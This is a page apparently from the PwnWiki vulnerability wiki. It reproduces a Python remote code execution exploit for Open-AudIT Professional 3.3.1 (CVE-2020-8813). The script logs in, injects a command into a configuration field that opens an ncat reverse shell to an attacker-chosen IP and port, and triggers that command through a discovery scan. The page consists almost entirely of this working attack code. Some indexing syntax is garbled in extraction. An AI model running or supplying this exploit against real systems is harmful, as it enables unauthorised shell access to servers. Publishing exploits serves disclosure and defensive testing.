免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
EXP
# Exploit Title: Open-AudIT Professional 3.3.1 - Remote Code Execution # Date: 2020-04-22 # Exploit Author: Askar # CVE: CVE-2020-8813 # Vendor Homepage: https://opmantek.com/ # Version: v3.3.1 # Tested on: Ubuntu 18.04 / PHP 7.2.24 #!/usr/bin/python3 import requests import sys import warnings import random import string from bs4 import BeautifulSoup from urllib.parse import quote warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) != 6: print("~ Usage : ./openaudit-exploit.py url username password ip port") exit() url = sys.argv1 username = sys.argv2 password = sys.argv3 ip = sys.argv4 port = sys.argv5 request = requests.session() def inject_payload(): configuration_path = url+"/en/omk/open-audit/configuration/90" data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port) request.patch(configuration_path, data) print("+ Payload injected in settings") def start_discovery(): discovery_path = url+"/en/omk/open-audit/discoveries/create" post_discovery_path = url+"/en/omk/open-audit/discoveries" scan_name = "".join(random.choice(string.ascii_uppercase) for i in range(10)) req = request.get(discovery_path) response = req.text soup = BeautifulSoup(response, "html5lib") token = soup.findAll('input')5.get("value") buttons = soup.findAll("button") headers = {"Referer" : discovery_path} request_data = { "dataattributesname":scan_name, "dataattributesothersubnet":"10.10.10.1/24", "dataattributesotherad_server":"", "dataattributesotherad_domain":"", "submit":"", "datatype":"discoveries", "dataaccess_token":token, "dataattributescomplete":"y", "dataattributesorg_id":"1", "dataattributestype":"subnet", "dataattributesdevices_assigned_to_org":"", "dataattributesdevices_assigned_to_location":"", "dataattributesothernmapdiscovery_scan_option_id":"1", "dataattributesothernmapping":"y", "dataattributesothernmapservice_version":"n", "dataattributesothernmapopen|filtered":"n", "dataattributesothernmapfiltered":"n", "dataattributesothernmaptiming":"4", "dataattributesothernmapnmap_tcp_ports":"0", "dataattributesothernmapnmap_udp_ports":"0", "dataattributesothernmaptcp_ports":"22,135,62078", "dataattributesothernmapudp_ports":"161", "dataattributesothernmaptimeout":"", "dataattributesothernmapexclude_tcp_ports":"", "dataattributesothernmapexclude_udp_ports":"", "dataattributesothernmapexclude_ip":"", "dataattributesothernmapssh_ports":"22", "dataattributesothermatchmatch_dbus":"", "dataattributesothermatchmatch_fqdn":"", "dataattributesothermatchmatch_dns_fqdn":"", "dataattributesothermatchmatch_dns_hostname":"", "dataattributesothermatchmatch_hostname":"", "dataattributesothermatchmatch_hostname_dbus":"", "dataattributesothermatchmatch_hostname_serial":"", "dataattributesothermatchmatch_hostname_uuid":"", "dataattributesothermatchmatch_ip":"", "dataattributesothermatchmatch_ip_no_data":"", "dataattributesothermatchmatch_mac":"", "dataattributesothermatchmatch_mac_vmware":"", "dataattributesothermatchmatch_serial":"", "dataattributesothermatchmatch_serial_type":"", "dataattributesothermatchmatch_sysname":"", "dataattributesothermatchmatch_sysname_serial":"", "dataattributesothermatchmatch_uuid":"" } print("+ Creating discovery ..") req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False) disocvery_url = url + req.headers'Location' + "/execute" print("+ Triggering payload ..") print("+ Check your nc ;)") request.get(disocvery_url) def login(): login_info = { "redirect_url": "/en/omk/open-audit", "username": username, "password": password } login_request = request.post(url+"/en/omk/open-audit/login", login_info) login_text = login_request.text if "There was an error authenticating" in login_text: return False else: return True if login(): print("+ LoggedIn Successfully") inject_payload() start_discovery() else: print("- Cannot login!")
pwnwiki.com